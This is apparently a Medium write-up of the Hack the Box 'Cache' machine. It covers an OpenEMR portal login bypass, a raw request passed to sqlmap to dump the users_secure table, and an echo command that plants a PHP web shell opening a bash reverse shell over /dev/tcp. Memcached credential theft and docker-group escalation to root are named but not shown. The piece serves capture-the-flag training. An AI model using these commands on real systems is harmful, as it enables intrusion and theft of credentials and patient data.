Hack the Box: Cache




Nmap reveals only one attack surface: the webserver:

Nmap scan
Main site
login page
Credentials in js file
OpenEMR login page


The copyright year points that the OpenEMR is propably in version 5.0.1:

OpenEMR version
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating tothe registration page and modifying the requested url to access the desired page.
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
password hash to openmr_admin
reversing the password
Admin interface
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php

User flag

Now, requesting the /sites/tellico.php will yield a reverse shell:

Reverse shell
User flag


User jiffy

Netstat show there’s some service listening locally on port 11211:

Netstat result
Listing content of memcached
Reading luffy credentials
Move to luffy

Docker privlege escalation

As seen on previous screen, luffy is a member of docker group. Docker can be exploit to spawn a root shell. First I need to find an existing local image:

Listing local docker images
Root flagcd



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store